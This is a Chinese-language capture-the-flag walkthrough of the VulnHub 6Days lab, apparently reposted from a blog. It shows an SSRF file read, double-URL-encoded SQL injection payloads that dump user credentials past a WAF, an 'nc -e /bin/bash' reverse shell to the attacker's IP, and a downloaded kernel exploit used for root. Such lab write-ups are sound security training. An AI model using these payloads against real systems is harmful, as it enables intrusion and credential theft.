标签：查看 2529% quote v1.0 2527% vulnhub 6Days print import

vulnhub靶场，6Days_Lab-v1.0.1

环境准备

靶机下载地址：https://www.vulnhub.com/entry/6days-lab-11,156/#flags
目标：获取根目录下的flag
下载好靶机后，使用VMware Workstation Pro虚拟机导入环境，启动即可，将网段设置为NAT模式

信息收集

1、获取靶机IP地址
kali攻击机输入netdiscover，不添加任何参数，会默认扫描机器网卡上的ip值的所有网段，获取到的靶机IP地址为192.168.58.143

2、查看靶机端口开启情况
kali攻击机输入nmap -v -Pn 192.168.58.143
-v：显示详细信息
-Pn：不使用ping扫描

如图所示，对方开启了22、80、8080端口
3、进入web网站查看
浏览器访问192.168.58.143的80端口

发现是一个ips（入侵防御系统）的界面，根据他的提示输入折扣码试试

显示代码已过期，在折扣码后面加入一个单引号看看是否存在SQL注入

意思为恶意请求被WAF阻挡。所以我们需要去找其他的方法去突破
查看页面源代码，发现image.php页面会进行引用图片

访问这个页面试试

这里感觉可能存在ssrf，将src后面改为index.php发现并没有拦截也没有报错，说明是存在ssrf漏洞的

4、使用dirb进行网站目录结果扫描

漏洞利用

1、通过前面信息收集的过程发现网站存在ssrf漏洞，但是页面并没有显示出来网站主页的源码，使用burpsuite抓包试试看

这里是成功回显出了网站主页的源码
2、查看passwd文件信息，得到靶机有账户user,andrea

3、查看config.php文件，得到数据库账号、密码、数据库名信息

4、查看其他文件发现均会被ips（入侵防御系统）拦截


5、查看apache默认配置信息

发现在apache默认文件中，发现网站实际就是在8080端口，只接受本地连接，然后转发到80端口，通过配置信息获得的消息，可以发现网站直接跟mysql数据库连接，存在SQL注入，两次url编码即可绕过

6、利用python，将注入的SQL语句经过两次url编码即可，使用ssrf加SQL注入拿到登入密码
7、查看为数字型还是字符型

from urllib.parse import quote
print(quote(quote("aa'")))    

结果：aa%2527

显示促销码无效

from urllib.parse import quote
print(quote(quote("aa'#")))    

结果：aa%2527%2523

发现能成功闭合，说明为字符型注入，闭合方式为’#
8、查看字段数

from urllib.parse import quote
print(quote(quote("aa' order by 2#")))    

结果：aa%2527%2520order%2520by%25202%2523

from urllib.parse import quote
print(quote(quote("aa' order by 3#")))    

结果：aa%2527%2520order%2520by%25203%2523

字段数为2的时候返回正常，字段数为3的时候返回促销码无效。所以判断字段数为2
9、查看回显位置

from urllib.parse import quote
print(quote(quote("aa' union select 1,2#")))    

结果：aa%2527%2520union%2520select%25201%252C2%2523

所以判断1的位置是有回显的
10、查看当前库

from urllib.parse import quote
print(quote(quote("aa' union select database(),2#")))    

结果：aa%2527%2520union%2520select%2520database%2528%2529%252C2%2523

所以当前库为fancydb
11、查看fancydb库下的所有表

from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#")))    

结果：aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%252C2%2523

12、查看users表下的所有字段

from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),2#")))

结果：aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_name%253D%2527users%2527%2529%252C2%2523

13、查看username和password字段的值

from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(concat_ws('~',username,password)) from users),2#")))

结果：aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528concat_ws%2528%2527~%2527%252Cusername%252Cpassword%2529%2529%2520from%2520users%2529%252C2%2523

14、成功得到账号密码，由前面信息收集可知靶机开启了22端口，使用ssh连接输入账号密码成功连接

但是发现输入一些命令并没有回显

15、可能是回显信息丢失，尝试反弹shell
攻击机重新打开一个终端，输入nc -lvvp 1111,监听本地端口

然后在靶机上执行nc -e /bin/bash 192.168.58.130 1111

可以看到监听的这边成功连接了

使用python反弹一个原始命令行

python -c 'import pty;pty.spawn("/bin/bash")'

权限提升

1、查看当前权限，发现只是一个普通的权限

2、查看当前系统内核，发现系统内核版本为3.13.0

3、使用kali搜索3.13.0版本可用的exp

4、开启kali的apache服务，将攻击脚本放到网站的根目录下面


5、在反弹的shell中下载攻击脚本

6、使用攻击脚本进行提权
因为攻击脚本是用c语言编写的，所以需要使用gcc对攻击脚本进行编译

输入./exp开启攻击，成功提升为root权限

7、提权成功后，切换到系统根目录，发现flag文件，发现为可执行脚本，./flag执行，得到flag

标签：查看,2529%,quote,v1.0,2527%,vulnhub,6Days,print,import
来源： https://blog.csdn.net/kukudeshuo/article/details/118573194

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。